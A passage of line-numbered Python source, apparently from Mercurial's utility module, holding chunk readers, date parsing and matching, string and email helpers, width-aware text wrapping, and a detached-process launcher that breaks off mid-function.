1891 1895 if len(chunk) > 2**20:
1892 1896 pos = 0
1893 1897 while pos < len(chunk):
1894 1898 end = pos + 2 ** 18
1895 1899 yield chunk[pos:end]
1896 1900 pos = end
1897 1901 else:
1898 1902 yield chunk
1899 1903 self.iter = splitbig(in_iter)
1900 1904 self._queue = collections.deque()
1901 1905 self._chunkoffset = 0
1902 1906
1903 1907 def read(self, l=None):
1904 1908 """Read L bytes of data from the iterator of chunks of data.
1905 1909 Returns less than L bytes if the iterator runs dry.
1906 1910
1907 1911 If size parameter is omitted, read everything"""
1908 1912 if l is None:
1909 1913 return ''.join(self.iter)
1910 1914
1911 1915 left = l
1912 1916 buf = []
1913 1917 queue = self._queue
1914 1918 while left > 0:
1915 1919 # refill the queue
1916 1920 if not queue:
1917 1921 target = 2**18
1918 1922 for chunk in self.iter:
1919 1923 queue.append(chunk)
1920 1924 target -= len(chunk)
1921 1925 if target <= 0:
1922 1926 break
1923 1927 if not queue:
1924 1928 break
1925 1929
1926 1930 # The easy way to do this would be to queue.popleft(), modify the
1927 1931 # chunk (if necessary), then queue.appendleft(). However, for cases
1928 1932 # where we read partial chunk content, this incurs 2 dequeue
1929 1933 # mutations and creates a new str for the remaining chunk in the
1930 1934 # queue. Our code below avoids this overhead.
1931 1935
1932 1936 chunk = queue[0]
1933 1937 chunkl = len(chunk)
1934 1938 offset = self._chunkoffset
1935 1939
1936 1940 # Use full chunk.
1937 1941 if offset == 0 and left >= chunkl:
1938 1942 left -= chunkl
1939 1943 queue.popleft()
1940 1944 buf.append(chunk)
1941 1945 # self._chunkoffset remains at 0.
1942 1946 continue
1943 1947
1944 1948 chunkremaining = chunkl - offset
1945 1949
1946 1950 # Use all of unconsumed part of chunk.
1947 1951 if left >= chunkremaining:
1948 1952 left -= chunkremaining
1949 1953 queue.popleft()
1950 1954 # offset == 0 is enabled by block above, so this won't merely
1951 1955 # copy via ``chunk[0:]``.
1952 1956 buf.append(chunk[offset:])
1953 1957 self._chunkoffset = 0
1954 1958
1955 1959 # Partial chunk needed.
1956 1960 else:
1957 1961 buf.append(chunk[offset:offset + left])
1958 1962 self._chunkoffset += left
1959 1963 left -= chunkremaining
1960 1964
1961 1965 return ''.join(buf)
1962 1966
1963 1967 def filechunkiter(f, size=131072, limit=None):
1964 1968 """Create a generator that produces the data in the file size
1965 1969 (default 131072) bytes at a time, up to optional limit (default is
1966 1970 to read all data). Chunks may be less than size bytes if the
1967 1971 chunk is the last chunk in the file, or the file is a socket or
1968 1972 some other type of file that sometimes reads less data than is
1969 1973 requested."""
1970 1974 assert size >= 0
1971 1975 assert limit is None or limit >= 0
1972 1976 while True:
1973 1977 if limit is None:
1974 1978 nbytes = size
1975 1979 else:
1976 1980 nbytes = min(limit, size)
1977 1981 s = nbytes and f.read(nbytes)
1978 1982 if not s:
1979 1983 break
1980 1984 if limit:
1981 1985 limit -= len(s)
1982 1986 yield s
1983 1987
1984 1988 class cappedreader(object):
1985 1989 """A file object proxy that allows reading up to N bytes.
1986 1990
1987 1991 Given a source file object, instances of this type allow reading up to
1988 1992 N bytes from that source file object. Attempts to read past the allowed
1989 1993 limit are treated as EOF.
1990 1994
1991 1995 It is assumed that I/O is not performed on the original file object
1992 1996 in addition to I/O that is performed by this instance. If there is,
1993 1997 state tracking will get out of sync and unexpected results will ensue.
1994 1998 """
1995 1999 def __init__(self, fh, limit):
1996 2000 """Allow reading up to <limit> bytes from <fh>."""
1997 2001 self._fh = fh
1998 2002 self._left = limit
1999 2003
2000 2004 def read(self, n=-1):
2001 2005 if not self._left:
2002 2006 return b''
2003 2007
2004 2008 if n < 0:
2005 2009 n = self._left
2006 2010
2007 2011 data = self._fh.read(min(n, self._left))
2008 2012 self._left -= len(data)
2009 2013 assert self._left >= 0
2010 2014
2011 2015 return data
2012 2016
2013 2017 def makedate(timestamp=None):
2014 2018 '''Return a unix timestamp (or the current time) as a (unixtime,
2015 2019 offset) tuple based off the local timezone.'''
2016 2020 if timestamp is None:
2017 2021 timestamp = time.time()
2018 2022 if timestamp < 0:
2019 2023 hint = _("check your clock")
2020 2024 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2021 2025 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2022 2026 datetime.datetime.fromtimestamp(timestamp))
2023 2027 tz = delta.days * 86400 + delta.seconds
2024 2028 return timestamp, tz
2025 2029
2026 2030 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2027 2031 """represent a (unixtime, offset) tuple as a localized time.
2028 2032 unixtime is seconds since the epoch, and offset is the time zone's
2029 2033 number of seconds away from UTC.
2030 2034
2031 2035 >>> datestr((0, 0))
2032 2036 'Thu Jan 01 00:00:00 1970 +0000'
2033 2037 >>> datestr((42, 0))
2034 2038 'Thu Jan 01 00:00:42 1970 +0000'
2035 2039 >>> datestr((-42, 0))
2036 2040 'Wed Dec 31 23:59:18 1969 +0000'
2037 2041 >>> datestr((0x7fffffff, 0))
2038 2042 'Tue Jan 19 03:14:07 2038 +0000'
2039 2043 >>> datestr((-0x80000000, 0))
2040 2044 'Fri Dec 13 20:45:52 1901 +0000'
2041 2045 """
2042 2046 t, tz = date or makedate()
2043 2047 if "%1" in format or "%2" in format or "%z" in format:
2044 2048 sign = (tz > 0) and "-" or "+"
2045 2049 minutes = abs(tz) // 60
2046 2050 q, r = divmod(minutes, 60)
2047 2051 format = format.replace("%z", "%1%2")
2048 2052 format = format.replace("%1", "%c%02d" % (sign, q))
2049 2053 format = format.replace("%2", "%02d" % r)
2050 2054 d = t - tz
2051 2055 if d > 0x7fffffff:
2052 2056 d = 0x7fffffff
2053 2057 elif d < -0x80000000:
2054 2058 d = -0x80000000
2055 2059 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2056 2060 # because they use the gmtime() system call which is buggy on Windows
2057 2061 # for negative values.
2058 2062 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2059 2063 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2060 2064 return s
2061 2065
2062 2066 def shortdate(date=None):
2063 2067 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2064 2068 return datestr(date, format='%Y-%m-%d')
2065 2069
2066 2070 def parsetimezone(s):
2067 2071 """find a trailing timezone, if any, in string, and return a
2068 2072 (offset, remainder) pair"""
2069 2073
2070 2074 if s.endswith("GMT") or s.endswith("UTC"):
2071 2075 return 0, s[:-3].rstrip()
2072 2076
2073 2077 # Unix-style timezones [+-]hhmm
2074 2078 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2075 2079 sign = (s[-5] == "+") and 1 or -1
2076 2080 hours = int(s[-4:-2])
2077 2081 minutes = int(s[-2:])
2078 2082 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2079 2083
2080 2084 # ISO8601 trailing Z
2081 2085 if s.endswith("Z") and s[-2:-1].isdigit():
2082 2086 return 0, s[:-1]
2083 2087
2084 2088 # ISO8601-style [+-]hh:mm
2085 2089 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2086 2090 s[-5:-3].isdigit() and s[-2:].isdigit()):
2087 2091 sign = (s[-6] == "+") and 1 or -1
2088 2092 hours = int(s[-5:-3])
2089 2093 minutes = int(s[-2:])
2090 2094 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2091 2095
2092 2096 return None, s
2093 2097
2094 2098 def strdate(string, format, defaults=None):
2095 2099 """parse a localized time string and return a (unixtime, offset) tuple.
2096 2100 if the string cannot be parsed, ValueError is raised."""
2097 2101 if defaults is None:
2098 2102 defaults = {}
2099 2103
2100 2104 # NOTE: unixtime = localunixtime + offset
2101 2105 offset, date = parsetimezone(string)
2102 2106
2103 2107 # add missing elements from defaults
2104 2108 usenow = False # default to using biased defaults
2105 2109 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2106 2110 part = pycompat.bytestr(part)
2107 2111 found = [True for p in part if ("%"+p) in format]
2108 2112 if not found:
2109 2113 date += "@" + defaults[part][usenow]
2110 2114 format += "@%" + part[0]
2111 2115 else:
2112 2116 # We've found a specific time element, less specific time
2113 2117 # elements are relative to today
2114 2118 usenow = True
2115 2119
2116 2120 timetuple = time.strptime(encoding.strfromlocal(date),
2117 2121 encoding.strfromlocal(format))
2118 2122 localunixtime = int(calendar.timegm(timetuple))
2119 2123 if offset is None:
2120 2124 # local timezone
2121 2125 unixtime = int(time.mktime(timetuple))
2122 2126 offset = unixtime - localunixtime
2123 2127 else:
2124 2128 unixtime = localunixtime + offset
2125 2129 return unixtime, offset
2126 2130
2127 2131 def parsedate(date, formats=None, bias=None):
2128 2132 """parse a localized date/time and return a (unixtime, offset) tuple.
2129 2133
2130 2134 The date may be a "unixtime offset" string or in one of the specified
2131 2135 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2132 2136
2133 2137 >>> parsedate(b' today ') == parsedate(
2134 2138 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2135 2139 True
2136 2140 >>> parsedate(b'yesterday ') == parsedate(
2137 2141 ... (datetime.date.today() - datetime.timedelta(days=1)
2138 2142 ... ).strftime('%b %d').encode('ascii'))
2139 2143 True
2140 2144 >>> now, tz = makedate()
2141 2145 >>> strnow, strtz = parsedate(b'now')
2142 2146 >>> (strnow - now) < 1
2143 2147 True
2144 2148 >>> tz == strtz
2145 2149 True
2146 2150 """
2147 2151 if bias is None:
2148 2152 bias = {}
2149 2153 if not date:
2150 2154 return 0, 0
2151 2155 if isinstance(date, tuple) and len(date) == 2:
2152 2156 return date
2153 2157 if not formats:
2154 2158 formats = defaultdateformats
2155 2159 date = date.strip()
2156 2160
2157 2161 if date == 'now' or date == _('now'):
2158 2162 return makedate()
2159 2163 if date == 'today' or date == _('today'):
2160 2164 date = datetime.date.today().strftime(r'%b %d')
2161 2165 date = encoding.strtolocal(date)
2162 2166 elif date == 'yesterday' or date == _('yesterday'):
2163 2167 date = (datetime.date.today() -
2164 2168 datetime.timedelta(days=1)).strftime(r'%b %d')
2165 2169 date = encoding.strtolocal(date)
2166 2170
2167 2171 try:
2168 2172 when, offset = map(int, date.split(' '))
2169 2173 except ValueError:
2170 2174 # fill out defaults
2171 2175 now = makedate()
2172 2176 defaults = {}
2173 2177 for part in ("d", "mb", "yY", "HI", "M", "S"):
2174 2178 # this piece is for rounding the specific end of unknowns
2175 2179 b = bias.get(part)
2176 2180 if b is None:
2177 2181 if part[0:1] in "HMS":
2178 2182 b = "00"
2179 2183 else:
2180 2184 b = "0"
2181 2185
2182 2186 # this piece is for matching the generic end to today's date
2183 2187 n = datestr(now, "%" + part[0:1])
2184 2188
2185 2189 defaults[part] = (b, n)
2186 2190
2187 2191 for format in formats:
2188 2192 try:
2189 2193 when, offset = strdate(date, format, defaults)
2190 2194 except (ValueError, OverflowError):
2191 2195 pass
2192 2196 else:
2193 2197 break
2194 2198 else:
2195 2199 raise error.ParseError(_('invalid date: %r') % date)
2196 2200 # validate explicit (probably user-specified) date and
2197 2201 # time zone offset. values must fit in signed 32 bits for
2198 2202 # current 32-bit linux runtimes. timezones go from UTC-12
2199 2203 # to UTC+14
2200 2204 if when < -0x80000000 or when > 0x7fffffff:
2201 2205 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2202 2206 if offset < -50400 or offset > 43200:
2203 2207 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2204 2208 return when, offset
2205 2209
2206 2210 def matchdate(date):
2207 2211 """Return a function that matches a given date match specifier
2208 2212
2209 2213 Formats include:
2210 2214
2211 2215 '{date}' match a given date to the accuracy provided
2212 2216
2213 2217 '<{date}' on or before a given date
2214 2218
2215 2219 '>{date}' on or after a given date
2216 2220
2217 2221 >>> p1 = parsedate(b"10:29:59")
2218 2222 >>> p2 = parsedate(b"10:30:00")
2219 2223 >>> p3 = parsedate(b"10:30:59")
2220 2224 >>> p4 = parsedate(b"10:31:00")
2221 2225 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2222 2226 >>> f = matchdate(b"10:30")
2223 2227 >>> f(p1[0])
2224 2228 False
2225 2229 >>> f(p2[0])
2226 2230 True
2227 2231 >>> f(p3[0])
2228 2232 True
2229 2233 >>> f(p4[0])
2230 2234 False
2231 2235 >>> f(p5[0])
2232 2236 False
2233 2237 """
2234 2238
2235 2239 def lower(date):
2236 2240 d = {'mb': "1", 'd': "1"}
2237 2241 return parsedate(date, extendeddateformats, d)[0]
2238 2242
2239 2243 def upper(date):
2240 2244 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2241 2245 for days in ("31", "30", "29"):
2242 2246 try:
2243 2247 d["d"] = days
2244 2248 return parsedate(date, extendeddateformats, d)[0]
2245 2249 except error.ParseError:
2246 2250 pass
2247 2251 d["d"] = "28"
2248 2252 return parsedate(date, extendeddateformats, d)[0]
2249 2253
2250 2254 date = date.strip()
2251 2255
2252 2256 if not date:
2253 2257 raise Abort(_("dates cannot consist entirely of whitespace"))
2254 2258 elif date[0] == "<":
2255 2259 if not date[1:]:
2256 2260 raise Abort(_("invalid day spec, use '<DATE'"))
2257 2261 when = upper(date[1:])
2258 2262 return lambda x: x <= when
2259 2263 elif date[0] == ">":
2260 2264 if not date[1:]:
2261 2265 raise Abort(_("invalid day spec, use '>DATE'"))
2262 2266 when = lower(date[1:])
2263 2267 return lambda x: x >= when
2264 2268 elif date[0] == "-":
2265 2269 try:
2266 2270 days = int(date[1:])
2267 2271 except ValueError:
2268 2272 raise Abort(_("invalid day spec: %s") % date[1:])
2269 2273 if days < 0:
2270 2274 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2271 2275 % date[1:])
2272 2276 when = makedate()[0] - days * 3600 * 24
2273 2277 return lambda x: x >= when
2274 2278 elif " to " in date:
2275 2279 a, b = date.split(" to ")
2276 2280 start, stop = lower(a), upper(b)
2277 2281 return lambda x: x >= start and x <= stop
2278 2282 else:
2279 2283 start, stop = lower(date), upper(date)
2280 2284 return lambda x: x >= start and x <= stop
2281 2285
2282 2286 def stringmatcher(pattern, casesensitive=True):
2283 2287 """
2284 2288 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2285 2289 returns the matcher name, pattern, and matcher function.
2286 2290 missing or unknown prefixes are treated as literal matches.
2287 2291
2288 2292 helper for tests:
2289 2293 >>> def test(pattern, *tests):
2290 2294 ... kind, pattern, matcher = stringmatcher(pattern)
2291 2295 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2292 2296 >>> def itest(pattern, *tests):
2293 2297 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2294 2298 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295 2299
2296 2300 exact matching (no prefix):
2297 2301 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2298 2302 ('literal', 'abcdefg', [False, False, True])
2299 2303
2300 2304 regex matching ('re:' prefix)
2301 2305 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2302 2306 ('re', 'a.+b', [False, False, True])
2303 2307
2304 2308 force exact matches ('literal:' prefix)
2305 2309 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2306 2310 ('literal', 're:foobar', [False, True])
2307 2311
2308 2312 unknown prefixes are ignored and treated as literals
2309 2313 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2310 2314 ('literal', 'foo:bar', [False, False, True])
2311 2315
2312 2316 case insensitive regex matches
2313 2317 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2314 2318 ('re', 'A.+b', [False, False, True])
2315 2319
2316 2320 case insensitive literal matches
2317 2321 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2318 2322 ('literal', 'ABCDEFG', [False, False, True])
2319 2323 """
2320 2324 if pattern.startswith('re:'):
2321 2325 pattern = pattern[3:]
2322 2326 try:
2323 2327 flags = 0
2324 2328 if not casesensitive:
2325 2329 flags = remod.I
2326 2330 regex = remod.compile(pattern, flags)
2327 2331 except remod.error as e:
2328 2332 raise error.ParseError(_('invalid regular expression: %s')
2329 2333 % e)
2330 2334 return 're', pattern, regex.search
2331 2335 elif pattern.startswith('literal:'):
2332 2336 pattern = pattern[8:]
2333 2337
2334 2338 match = pattern.__eq__
2335 2339
2336 2340 if not casesensitive:
2337 2341 ipat = encoding.lower(pattern)
2338 2342 match = lambda s: ipat == encoding.lower(s)
2339 2343 return 'literal', pattern, match
2340 2344
2341 2345 def shortuser(user):
2342 2346 """Return a short representation of a user name or email address."""
2343 2347 f = user.find('@')
2344 2348 if f >= 0:
2345 2349 user = user[:f]
2346 2350 f = user.find('<')
2347 2351 if f >= 0:
2348 2352 user = user[f + 1:]
2349 2353 f = user.find(' ')
2350 2354 if f >= 0:
2351 2355 user = user[:f]
2352 2356 f = user.find('.')
2353 2357 if f >= 0:
2354 2358 user = user[:f]
2355 2359 return user
2356 2360
2357 2361 def emailuser(user):
2358 2362 """Return the user portion of an email address."""
2359 2363 f = user.find('@')
2360 2364 if f >= 0:
2361 2365 user = user[:f]
2362 2366 f = user.find('<')
2363 2367 if f >= 0:
2364 2368 user = user[f + 1:]
2365 2369 return user
2366 2370
2367 2371 def email(author):
2368 2372 '''get email of author.'''
2369 2373 r = author.find('>')
2370 2374 if r == -1:
2371 2375 r = None
2372 2376 return author[author.find('<') + 1:r]
2373 2377
2374 2378 def ellipsis(text, maxlength=400):
2375 2379 """Trim string to at most maxlength (default: 400) columns in display."""
2376 2380 return encoding.trim(text, maxlength, ellipsis='...')
2377 2381
2378 2382 def unitcountfn(*unittable):
2379 2383 '''return a function that renders a readable count of some quantity'''
2380 2384
2381 2385 def go(count):
2382 2386 for multiplier, divisor, format in unittable:
2383 2387 if abs(count) >= divisor * multiplier:
2384 2388 return format % (count / float(divisor))
2385 2389 return unittable[-1][2] % count
2386 2390
2387 2391 return go
2388 2392
2389 2393 def processlinerange(fromline, toline):
2390 2394 """Check that linerange <fromline>:<toline> makes sense and return a
2391 2395 0-based range.
2392 2396
2393 2397 >>> processlinerange(10, 20)
2394 2398 (9, 20)
2395 2399 >>> processlinerange(2, 1)
2396 2400 Traceback (most recent call last):
2397 2401 ...
2398 2402 ParseError: line range must be positive
2399 2403 >>> processlinerange(0, 5)
2400 2404 Traceback (most recent call last):
2401 2405 ...
2402 2406 ParseError: fromline must be strictly positive
2403 2407 """
2404 2408 if toline - fromline < 0:
2405 2409 raise error.ParseError(_("line range must be positive"))
2406 2410 if fromline < 1:
2407 2411 raise error.ParseError(_("fromline must be strictly positive"))
2408 2412 return fromline - 1, toline
2409 2413
2410 2414 bytecount = unitcountfn(
2411 2415 (100, 1 << 30, _('%.0f GB')),
2412 2416 (10, 1 << 30, _('%.1f GB')),
2413 2417 (1, 1 << 30, _('%.2f GB')),
2414 2418 (100, 1 << 20, _('%.0f MB')),
2415 2419 (10, 1 << 20, _('%.1f MB')),
2416 2420 (1, 1 << 20, _('%.2f MB')),
2417 2421 (100, 1 << 10, _('%.0f KB')),
2418 2422 (10, 1 << 10, _('%.1f KB')),
2419 2423 (1, 1 << 10, _('%.2f KB')),
2420 2424 (1, 1, _('%.0f bytes')),
2421 2425 )
2422 2426
2423 2427 # Matches a single EOL which can either be a CRLF where repeated CR
2424 2428 # are removed or a LF. We do not care about old Macintosh files, so a
2425 2429 # stray CR is an error.
2426 2430 _eolre = remod.compile(br'\r*\n')
2427 2431
2428 2432 def tolf(s):
2429 2433 return _eolre.sub('\n', s)
2430 2434
2431 2435 def tocrlf(s):
2432 2436 return _eolre.sub('\r\n', s)
2433 2437
2434 2438 if pycompat.oslinesep == '\r\n':
2435 2439 tonativeeol = tocrlf
2436 2440 fromnativeeol = tolf
2437 2441 else:
2438 2442 tonativeeol = pycompat.identity
2439 2443 fromnativeeol = pycompat.identity
2440 2444
2441 2445 def escapestr(s):
2442 2446 # call underlying function of s.encode('string_escape') directly for
2443 2447 # Python 3 compatibility
2444 2448 return codecs.escape_encode(s)[0]
2445 2449
2446 2450 def unescapestr(s):
2447 2451 return codecs.escape_decode(s)[0]
2448 2452
2449 2453 def forcebytestr(obj):
2450 2454 """Portably format an arbitrary object (e.g. exception) into a byte
2451 2455 string."""
2452 2456 try:
2453 2457 return pycompat.bytestr(obj)
2454 2458 except UnicodeEncodeError:
2455 2459 # non-ascii string, may be lossy
2456 2460 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2457 2461
2458 2462 def uirepr(s):
2459 2463 # Avoid double backslash in Windows path repr()
2460 2464 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2461 2465
2462 2466 # delay import of textwrap
2463 2467 def MBTextWrapper(**kwargs):
2464 2468 class tw(textwrap.TextWrapper):
2465 2469 """
2466 2470 Extend TextWrapper for width-awareness.
2467 2471
2468 2472 Neither number of 'bytes' in any encoding nor 'characters' is
2469 2473 appropriate to calculate terminal columns for specified string.
2470 2474
2471 2475 Original TextWrapper implementation uses built-in 'len()' directly,
2472 2476 so overriding is needed to use width information of each characters.
2473 2477
2474 2478 In addition, characters classified into 'ambiguous' width are
2475 2479 treated as wide in East Asian area, but as narrow in other.
2476 2480
2477 2481 This requires use decision to determine width of such characters.
2478 2482 """
2479 2483 def _cutdown(self, ucstr, space_left):
2480 2484 l = 0
2481 2485 colwidth = encoding.ucolwidth
2482 2486 for i in xrange(len(ucstr)):
2483 2487 l += colwidth(ucstr[i])
2484 2488 if space_left < l:
2485 2489 return (ucstr[:i], ucstr[i:])
2486 2490 return ucstr, ''
2487 2491
2488 2492 # overriding of base class
2489 2493 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2490 2494 space_left = max(width - cur_len, 1)
2491 2495
2492 2496 if self.break_long_words:
2493 2497 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2494 2498 cur_line.append(cut)
2495 2499 reversed_chunks[-1] = res
2496 2500 elif not cur_line:
2497 2501 cur_line.append(reversed_chunks.pop())
2498 2502
2499 2503 # this overriding code is imported from TextWrapper of Python 2.6
2500 2504 # to calculate columns of string by 'encoding.ucolwidth()'
2501 2505 def _wrap_chunks(self, chunks):
2502 2506 colwidth = encoding.ucolwidth
2503 2507
2504 2508 lines = []
2505 2509 if self.width <= 0:
2506 2510 raise ValueError("invalid width %r (must be > 0)" % self.width)
2507 2511
2508 2512 # Arrange in reverse order so items can be efficiently popped
2509 2513 # from a stack of chucks.
2510 2514 chunks.reverse()
2511 2515
2512 2516 while chunks:
2513 2517
2514 2518 # Start the list of chunks that will make up the current line.
2515 2519 # cur_len is just the length of all the chunks in cur_line.
2516 2520 cur_line = []
2517 2521 cur_len = 0
2518 2522
2519 2523 # Figure out which static string will prefix this line.
2520 2524 if lines:
2521 2525 indent = self.subsequent_indent
2522 2526 else:
2523 2527 indent = self.initial_indent
2524 2528
2525 2529 # Maximum width for this line.
2526 2530 width = self.width - len(indent)
2527 2531
2528 2532 # First chunk on line is whitespace -- drop it, unless this
2529 2533 # is the very beginning of the text (i.e. no lines started yet).
2530 2534 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2531 2535 del chunks[-1]
2532 2536
2533 2537 while chunks:
2534 2538 l = colwidth(chunks[-1])
2535 2539
2536 2540 # Can at least squeeze this chunk onto the current line.
2537 2541 if cur_len + l <= width:
2538 2542 cur_line.append(chunks.pop())
2539 2543 cur_len += l
2540 2544
2541 2545 # Nope, this line is full.
2542 2546 else:
2543 2547 break
2544 2548
2545 2549 # The current line is full, and the next chunk is too big to
2546 2550 # fit on *any* line (not just this one).
2547 2551 if chunks and colwidth(chunks[-1]) > width:
2548 2552 self._handle_long_word(chunks, cur_line, cur_len, width)
2549 2553
2550 2554 # If the last chunk on this line is all whitespace, drop it.
2551 2555 if (self.drop_whitespace and
2552 2556 cur_line and cur_line[-1].strip() == r''):
2553 2557 del cur_line[-1]
2554 2558
2555 2559 # Convert current line back to a string and store it in list
2556 2560 # of all lines (return value).
2557 2561 if cur_line:
2558 2562 lines.append(indent + r''.join(cur_line))
2559 2563
2560 2564 return lines
2561 2565
2562 2566 global MBTextWrapper
2563 2567 MBTextWrapper = tw
2564 2568 return tw(**kwargs)
2565 2569
2566 2570 def wrap(line, width, initindent='', hangindent=''):
2567 2571 maxindent = max(len(hangindent), len(initindent))
2568 2572 if width <= maxindent:
2569 2573 # adjust for weird terminal size
2570 2574 width = max(78, maxindent + 1)
2571 2575 line = line.decode(pycompat.sysstr(encoding.encoding),
2572 2576 pycompat.sysstr(encoding.encodingmode))
2573 2577 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2574 2578 pycompat.sysstr(encoding.encodingmode))
2575 2579 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2576 2580 pycompat.sysstr(encoding.encodingmode))
2577 2581 wrapper = MBTextWrapper(width=width,
2578 2582 initial_indent=initindent,
2579 2583 subsequent_indent=hangindent)
2580 2584 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2581 2585
2582 2586 if (pyplatform.python_implementation() == 'CPython' and
2583 2587 sys.version_info < (3, 0)):
2584 2588 # There is an issue in CPython that some IO methods do not handle EINTR
2585 2589 # correctly. The following table shows what CPython version (and functions)
2586 2590 # are affected (buggy: has the EINTR bug, okay: otherwise):
2587 2591 #
2588 2592 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2589 2593 # --------------------------------------------------
2590 2594 # fp.__iter__ | buggy | buggy | okay
2591 2595 # fp.read* | buggy | okay [1] | okay
2592 2596 #
2593 2597 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2594 2598 #
2595 2599 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2596 2600 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2597 2601 #
2598 2602 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2599 2603 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2600 2604 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2601 2605 # fp.__iter__ but not other fp.read* methods.
2602 2606 #
2603 2607 # On modern systems like Linux, the "read" syscall cannot be interrupted
2604 2608 # when reading "fast" files like on-disk files. So the EINTR issue only
2605 2609 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2606 2610 # files approximately as "fast" files and use the fast (unsafe) code path,
2607 2611 # to minimize the performance impact.
2608 2612 if sys.version_info >= (2, 7, 4):
2609 2613 # fp.readline deals with EINTR correctly, use it as a workaround.
2610 2614 def _safeiterfile(fp):
2611 2615 return iter(fp.readline, '')
2612 2616 else:
2613 2617 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2614 2618 # note: this may block longer than necessary because of bufsize.
2615 2619 def _safeiterfile(fp, bufsize=4096):
2616 2620 fd = fp.fileno()
2617 2621 line = ''
2618 2622 while True:
2619 2623 try:
2620 2624 buf = os.read(fd, bufsize)
2621 2625 except OSError as ex:
2622 2626 # os.read only raises EINTR before any data is read
2623 2627 if ex.errno == errno.EINTR:
2624 2628 continue
2625 2629 else:
2626 2630 raise
2627 2631 line += buf
2628 2632 if '\n' in buf:
2629 2633 splitted = line.splitlines(True)
2630 2634 line = ''
2631 2635 for l in splitted:
2632 2636 if l[-1] == '\n':
2633 2637 yield l
2634 2638 else:
2635 2639 line = l
2636 2640 if not buf:
2637 2641 break
2638 2642 if line:
2639 2643 yield line
2640 2644
2641 2645 def iterfile(fp):
2642 2646 fastpath = True
2643 2647 if type(fp) is file:
2644 2648 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2645 2649 if fastpath:
2646 2650 return fp
2647 2651 else:
2648 2652 return _safeiterfile(fp)
2649 2653 else:
2650 2654 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2651 2655 def iterfile(fp):
2652 2656 return fp
2653 2657
2654 2658 def iterlines(iterator):
2655 2659 for chunk in iterator:
2656 2660 for line in chunk.splitlines():
2657 2661 yield line
2658 2662
2659 2663 def expandpath(path):
2660 2664 return os.path.expanduser(os.path.expandvars(path))
2661 2665
2662 2666 def hgcmd():
2663 2667 """Return the command used to execute current hg
2664 2668
2665 2669 This is different from hgexecutable() because on Windows we want
2666 2670 to avoid things opening new shell windows like batch files, so we
2667 2671 get either the python call or current executable.
2668 2672 """
2669 2673 if mainfrozen():
2670 2674 if getattr(sys, 'frozen', None) == 'macosx_app':
2671 2675 # Env variable set by py2app
2672 2676 return [encoding.environ['EXECUTABLEPATH']]
2673 2677 else:
2674 2678 return [pycompat.sysexecutable]
2675 2679 return gethgcmd()
2676 2680
2677 2681 def rundetached(args, condfn):
2678 2682 """Execute the argument list in a detached process.
2679 2683
2680 2684 condfn is a callable which is called repeatedly and should return
2681 2685 True once the child process is known to have started successfully.
2682 2686 At this point, the child process PID is returned. If the child
2683 2687 process fails to start or finishes before condfn() evaluates to
2684 2688 True, return -1.
2685 2689 """
2686 2690 # Windows case is easier because the child process is either
2687 2691 # successfully starting and validating the condition or exiting
2688 2692 # on failure. We just poll on its PID. On Unix, if the child
2689 2693 # process fails to start, it will be left in a zombie state until
2690 2694 # the parent wait on it, which we cannot do since we expect a long
2691 2695 # running process on success. Instead we listen for SIGCHLD telling
2692 2696 # us our child process terminated.
2693 2697 terminated = set()
2694 2698 def handler(signum, frame):
2695 2699 terminated.add(os.wait())
2696 2700 prevhandler = None
2697 2701 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2698 2702 if SIGCHLD is not None:
2699 2703 prevhandler = signal.signal(SIGCHLD, handler)
2700 2704 try:
2701 2705 pid = spawndetached(args)
2702 2706 while not condfn():
2703 2707 if ((pid in terminated or not testpid(pid))
2704 2708 and not condfn()):
2705 2709 return -1
2706 2710 time.sleep(0.1)
2707 2711 return pid
2708 2712 finally:
2709 2713 if prevhandler is not None:
